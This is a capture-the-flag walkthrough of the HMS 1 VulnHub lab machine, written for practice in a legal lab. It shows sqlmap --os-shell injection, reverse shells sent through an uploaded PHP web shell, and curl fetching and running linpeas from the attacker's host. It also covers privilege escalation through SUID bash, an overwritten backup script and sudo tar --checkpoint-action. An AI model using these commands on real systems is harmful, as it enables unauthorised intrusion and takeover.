
Exploiting vulnerable machines in a legal and safe environment is the only way to become an experienced ethical hacker. That is what this site is dedicated to, and so I present to you the HMS 1 vulnhub walkthrough, another of the vulnhub series here on the site. HMS 1 is a vulnerable Linux box created by Nivek. The HMS 1 vulnhub box is an excellent practice for Linux privilege escalation and a delightfully refreshing exercise in learning web app hacking.

Here is an overview of what you can expect to learn from completing the HMS 1 vulnhub walkthrough:

  • Manual SQL Injection and Exploitation
  • Using SQLMap for SQL Injection and Getting a Reverse Shell
  • Linux Privilege Escalation

Here’s What You Need

  1. HMS:1 VM
  2. Kali Linux VM
  3. VirtualBox (preferably a Host-Only network setting)

Initial Enumeration

An nmap scan of all TCP ports (-p-) with the default scripts (-sC) reveals a few open ports, mainly web and FTP. The web app is running on the non-standard high port 7080.

nmap -sT -sC -p- 192.168.1.145

Web App Enumeration

One of the first steps to complete for this challenge is web enumeration, since there could be some interesting directories and pages in this web app. The wfuzz tool is great for completing this task; the --sc 200 filter below shows only hits that return HTTP 200.

wfuzz --sc 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.1.145:7080/FUZZ.php

One of those interesting pages is the login page, found at /login.php, which suggests that HMS stands for “Hospital Management System”. We could look up published exploits for a web app with that name, but it turns out this is a custom-made app. Another page, header.php, reveals the website of the app’s developer.

We can find the credentials for our first web app user by downloading the source code for the app.

At this point in the challenge we have our first set of credentials, so let’s login to the web app and see what is behind this login.

Get Your First Shell

There are multiple ways of getting your first shell by exploiting the SQL injection vulnerability in the app. I am going to highlight two methods here: using SQLMap and using manual injection followed by uploading a reverse webshell.

  1. Log in to the admin portal, capture the login request in Burp Suite and save it to a file named request.
  2. Feed SQLMap the request file and add the --os-shell flag.

SQLMap has a flag that will attempt to open a web shell on the target by exploiting the SQL injection vulnerability.

sqlmap -r request --os-shell

This os-shell prompt is awkward to work with, however, so we will pivot to the PHP web shell that SQLMap had to upload to the web root in order to provide it. That file takes commands through its cmd parameter, which gives us remote code execution directly over HTTP.

Looking around the web root from the os-shell prompt, I located the file SQLMap uploaded, tmpbtvz.php (the name is randomly generated, so yours will differ).

So how do we go from running whoami through the cmd parameter to a reverse shell on our Kali Linux machine? Start a netcat listener on Kali, then send the PayloadsAllTheThings netcat OpenBSD reverse shell one-liner through the cmd parameter, URL-encoding the full command, everything after cmd=. Without the encoding, characters such as &, | and the spaces are interpreted as part of the query string rather than the command, and the payload will not work!

Linux Privilege Escalation: Daemon to Eren

Unfortunately the user we now connect as is daemon, which is severely limited in what it can do. After uploading the linpeas script to the target and reading through its output, though, there is a file owned by eren which has the SUID bit set: /usr/bin/bash. GTFOBins documents how to abuse an SUID bash: run it with -p so that it keeps the effective user ID of its owner instead of dropping back to the caller's privileges.

# KALI LINUX
# get linpeas
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
# start a web server from the directory that contains linpeas.sh
sudo python3 -m http.server 80
# TARGET
# run linpeas (1/4): work from a directory daemon can write to
daemon@nevik: $ cd /tmp
# run linpeas (2/4): fetch the script (curl -O takes no argument; -o names the output file)
daemon@nevik: $ curl -o linpeas.sh http://KALILINUX:80/linpeas.sh
# run linpeas (3/4)
daemon@nevik: $ chmod +x linpeas.sh
# run linpeas (4/4)
daemon@nevik: $ ./linpeas.sh
# confirm the SUID finding by hand
daemon@nevik: $ find / -perm -u=s -type f 2>/dev/null
# run the SUID bash with -p so the effective UID (eren) is kept
daemon@nevik: $ /usr/bin/bash -p

The enumeration script has also found an interesting file /home/eren/backup.sh. The script is performing some kind of backup function for the web files, but not for long as we will weaponize it! In order to get a proper shell as eren we will need to write over the existing backup.sh script with a reverse shell oneliner that will send a new shell to our Kali Linux netcat listener.

Overwriting backup.sh with a single line of Bash is all it takes to send the new shell.

Notice how the EUID (effective user ID) reported by id is now eren's.

No more daemon: we are now eren.

Linux Privilege Escalation: Eren to Root

Now that we have a proper shell as eren, and not just eren's EUID, we can finally check what this user may run with sudo (sudo -l). It turns out eren can run the tar command with sudo. GTFOBins (a link worth bookmarking) lists an easy way to abuse tar for privilege escalation: its --checkpoint-action option runs an arbitrary command, so tar run under sudo can spawn a root shell.
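To see why the GTFOBins trick works before running it as root, here is an added example (not from the page) that exercises the same tar primitive without sudo. GNU tar hands the value of --checkpoint-action=exec= to /bin/sh -c, so whatever user tar runs as executes it; with sudo in front, that user is root.

```shell
#!/bin/sh
# Added example: GNU tar's --checkpoint-action=exec runs a shell command as
# tar's own user. Run without sudo here so it is safe to try; on the box the
# same command is prefixed with sudo and the action is /bin/sh.
tar_checkpoint_exec() {
  # $1: command to run in tar's context. /dev/null as both archive and member
  # is enough to trigger one checkpoint, which is why GTFOBins uses it.
  tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="$1"
}

# Exact command for the box once "sudo -l" shows tar, as on the page:
#   sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```

Running tar_checkpoint_exec "id > /tmp/tar_ran" and reading the file shows the command executed with tar's UID; substituting /bin/sh and sudo turns the same mechanism into the root shell.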

Running that tar command with sudo gives us a root shell, and it’s a jolly maneuver to the root user’s home directory to find and print the root flag.

we have root!

Exploit Without Using SQLMap

If you are training for the OSCP certification you will know that automated exploitation tools such as SQLMap are not permitted on the exam. With that in mind, here is the other exploit method, a manual approach.

Navigate back to the login page and open the browser's developer tools to view the source. The email field carries type="email", so the browser refuses to submit anything that is not a syntactically valid address; delete that attribute from the input element, enter the SQL injection string in the field, and hit Enter. This validation only ever existed client-side, so the server's query receives the injection unchanged.

Once logged into the dashboard, the page source reveals another page named setting. This page has an image upload feature which we will use to upload a web shell. Copy /usr/share/webshells/php/php-reverse-shell.php from Kali, edit its $ip and $port variables to point at your Kali Linux machine and listener, start the listener, and upload the file as myshell.php. Then browse to it at /uploadImage/Logo/myshell.php to receive a new shell back!
